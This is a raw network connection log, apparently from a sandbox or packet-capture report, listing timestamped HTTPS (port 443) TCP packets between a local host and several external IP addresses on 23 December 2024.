                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.598361015 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.600445986 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.600495100 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.607104063 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.607152939 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.614027023 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.614077091 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.617754936 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.617811918 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.627888918 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.627938986 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.631406069 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.631453037 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.641387939 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.641439915 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.644077063 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.644129992 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.655081034 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.655319929 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.657751083 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.657902002 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.667947054 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.668030024 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.670675993 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.670727015 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.680624008 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.680829048 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.683414936 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.683463097 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.693310022 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.693377972 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.696064949 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.696116924 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.705948114 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.706027985 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.706089973 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.706132889 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.718725920 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.718790054 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.718961954 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.719021082 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.777708054 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.777760029 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.777775049 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.777817965 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.779879093 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.779939890 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.784267902 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.784315109 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.784379959 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.784435987 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.788700104 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.788773060 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.790684938 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.790740013 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.790813923 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.790859938 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.798352003 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.798439026 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.798456907 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.798614979 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.800452948 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.800506115 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.809984922 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.810055971 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.811985970 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.812056065 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.821533918 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.821587086 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.823555946 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.823605061 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.832408905 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.832484007 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.833764076 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.833811045 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.842978001 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.843055010 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.844360113 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.844404936 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.853701115 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.853770971 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.855087042 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.855132103 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.864444017 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.864518881 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.864572048 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.864626884 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.875157118 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.875224113 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.875233889 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.875273943 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.885157108 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.885204077 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.885291100 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.885473967 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.895204067 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.895257950 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.895273924 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.895337105 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.904670000 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.904719114 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.904758930 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.904804945 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.913677931 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.913727045 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.913738012 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.913779974 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.922240973 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.922296047 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.922305107 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.922342062 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.923557997 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.923600912 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.930867910 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.930915117 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.932324886 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.932375908 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.939233065 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.939292908 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.940437078 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.940483093 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.953191996 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.953537941 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.954689980 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.954735994 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.954742908 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.954756021 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.954766035 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.954776049 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.954787970 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.954809904 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:58.165688992 CET49832443192.168.2.616.12.1.68
                                                                                                                                                                                                                              Dec 23, 2024 10:33:58.165755033 CET4434983216.12.1.68192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:58.165893078 CET49832443192.168.2.616.12.1.68
                                                                                                                                                                                                                              Dec 23, 2024 10:33:58.169687033 CET49832443192.168.2.616.12.1.68
                                                                                                                                                                                                                              Dec 23, 2024 10:33:58.169717073 CET4434983216.12.1.68192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:58.713831902 CET49834443192.168.2.616.12.2.2
                                                                                                                                                                                                                              Dec 23, 2024 10:33:58.713932037 CET4434983416.12.2.2192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:58.714027882 CET49834443192.168.2.616.12.2.2
                                                                                                                                                                                                                              Dec 23, 2024 10:33:58.714581013 CET49834443192.168.2.616.12.2.2
                                                                                                                                                                                                                              Dec 23, 2024 10:33:58.714612961 CET4434983416.12.2.2192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:59.157695055 CET49837443192.168.2.692.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:33:59.157779932 CET4434983792.205.57.102192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:59.157865047 CET49837443192.168.2.692.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:33:59.170629025 CET49837443192.168.2.692.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:33:59.170646906 CET4434983792.205.57.102192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:59.806272984 CET4434983216.12.1.68192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:59.806360006 CET49832443192.168.2.616.12.1.68
                                                                                                                                                                                                                              Dec 23, 2024 10:33:59.842931032 CET49832443192.168.2.616.12.1.68
                                                                                                                                                                                                                              Dec 23, 2024 10:33:59.842982054 CET4434983216.12.1.68192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:59.843903065 CET4434983216.12.1.68192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:59.843983889 CET49832443192.168.2.616.12.1.68
                                                                                                                                                                                                                              Dec 23, 2024 10:33:59.851396084 CET49832443192.168.2.616.12.1.68
                                                                                                                                                                                                                              Dec 23, 2024 10:33:59.895333052 CET4434983216.12.1.68192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:00.348086119 CET4434983416.12.2.2192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:00.348155022 CET49834443192.168.2.616.12.2.2
                                                                                                                                                                                                                              Dec 23, 2024 10:34:00.351306915 CET49834443192.168.2.616.12.2.2
                                                                                                                                                                                                                              Dec 23, 2024 10:34:00.351329088 CET4434983416.12.2.2192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:00.351650000 CET4434983416.12.2.2192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:00.351702929 CET49834443192.168.2.616.12.2.2
                                                                                                                                                                                                                              Dec 23, 2024 10:34:00.352072954 CET49834443192.168.2.616.12.2.2
                                                                                                                                                                                                                              Dec 23, 2024 10:34:00.362601042 CET4434983216.12.1.68192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:00.362670898 CET49832443192.168.2.616.12.1.68
                                                                                                                                                                                                                              Dec 23, 2024 10:34:00.362695932 CET4434983216.12.1.68192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:00.362757921 CET49832443192.168.2.616.12.1.68
                                                                                                                                                                                                                              Dec 23, 2024 10:34:00.362785101 CET49832443192.168.2.616.12.1.68
                                                                                                                                                                                                                              Dec 23, 2024 10:34:00.362792015 CET4434983216.12.1.68192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:00.362806082 CET49832443192.168.2.616.12.1.68
                                                                                                                                                                                                                              Dec 23, 2024 10:34:00.362818956 CET4434983216.12.1.68192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:00.362842083 CET49832443192.168.2.616.12.1.68
                                                                                                                                                                                                                              Dec 23, 2024 10:34:00.362859011 CET49832443192.168.2.616.12.1.68
                                                                                                                                                                                                                              Dec 23, 2024 10:34:00.399338007 CET4434983416.12.2.2192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:00.587658882 CET4434983792.205.57.102192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:00.587745905 CET49837443192.168.2.692.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:34:00.633439064 CET49837443192.168.2.692.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:34:00.633485079 CET4434983792.205.57.102192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:00.634388924 CET4434983792.205.57.102192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:00.634460926 CET49837443192.168.2.692.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:34:00.636081934 CET49837443192.168.2.692.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:34:00.683339119 CET4434983792.205.57.102192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:00.925251007 CET4434983416.12.2.2192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:00.925405979 CET4434983416.12.2.2192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:00.925416946 CET49834443192.168.2.616.12.2.2
                                                                                                                                                                                                                              Dec 23, 2024 10:34:00.925713062 CET49834443192.168.2.616.12.2.2
                                                                                                                                                                                                                              Dec 23, 2024 10:34:00.926017046 CET49834443192.168.2.616.12.2.2
                                                                                                                                                                                                                              Dec 23, 2024 10:34:00.926038027 CET4434983416.12.2.2192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:01.109502077 CET4434983792.205.57.102192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:01.109579086 CET49837443192.168.2.692.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:34:01.109601974 CET4434983792.205.57.102192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:01.109654903 CET49837443192.168.2.692.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:34:01.113889933 CET49837443192.168.2.692.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:34:01.113934994 CET4434983792.205.57.102192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:01.122025967 CET49845443192.168.2.692.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:34:01.122070074 CET4434984592.205.57.102192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:01.122297049 CET49845443192.168.2.692.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:34:01.122518063 CET49845443192.168.2.692.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:34:01.122530937 CET4434984592.205.57.102192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:02.506326914 CET4434984592.205.57.102192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:02.509779930 CET49845443192.168.2.692.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:34:02.538636923 CET49845443192.168.2.692.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:34:02.538647890 CET4434984592.205.57.102192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:02.539072990 CET49845443192.168.2.692.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:34:02.539077044 CET4434984592.205.57.102192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:03.031876087 CET4434984592.205.57.102192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:03.031964064 CET49845443192.168.2.692.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:34:03.031986952 CET4434984592.205.57.102192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:03.032037020 CET49845443192.168.2.692.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:34:03.223885059 CET4434984592.205.57.102192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:03.223911047 CET4434984592.205.57.102192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:03.223956108 CET4434984592.205.57.102192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:03.223962069 CET49845443192.168.2.692.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:34:03.223982096 CET4434984592.205.57.102192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:03.224013090 CET49845443192.168.2.692.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:34:03.224021912 CET4434984592.205.57.102192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:03.224035978 CET49845443192.168.2.692.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:34:03.224061966 CET49845443192.168.2.692.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:34:03.247152090 CET4434984592.205.57.102192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:03.247205973 CET4434984592.205.57.102192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:03.247227907 CET49845443192.168.2.692.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:34:03.247236013 CET4434984592.205.57.102192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:03.247263908 CET49845443192.168.2.692.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:34:03.247279882 CET49845443192.168.2.692.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:34:03.247286081 CET4434984592.205.57.102192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:03.247322083 CET49845443192.168.2.692.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:34:03.247363091 CET4434984592.205.57.102192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:03.247411013 CET49845443192.168.2.692.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:34:03.247416973 CET4434984592.205.57.102192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:03.247457981 CET49845443192.168.2.692.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:34:03.247517109 CET4434984592.205.57.102192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:03.247566938 CET49845443192.168.2.692.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:34:03.248599052 CET49845443192.168.2.692.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:34:03.248613119 CET4434984592.205.57.102192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:04.771747112 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:04.771760941 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:04.776734114 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:04.777477980 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:04.777488947 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:06.466810942 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:06.467149019 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:06.467680931 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:06.467688084 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:06.467928886 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:06.467932940 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.154130936 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.154189110 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.154213905 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.154216051 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.154227972 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.154257059 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.155122995 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.155133009 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.155189037 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.162792921 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.162957907 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.168711901 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.168782949 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.168945074 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.168996096 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.177218914 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.177376986 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.181391001 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.181525946 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.273627043 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.273716927 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.273725986 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.274013042 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.277961969 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.278023958 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.340486050 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.340673923 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.346064091 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.346173048 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.349942923 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.350074053 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.351162910 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.351203918 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.358510017 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.358673096 CET49859443192.168.2.6172.217.19.194
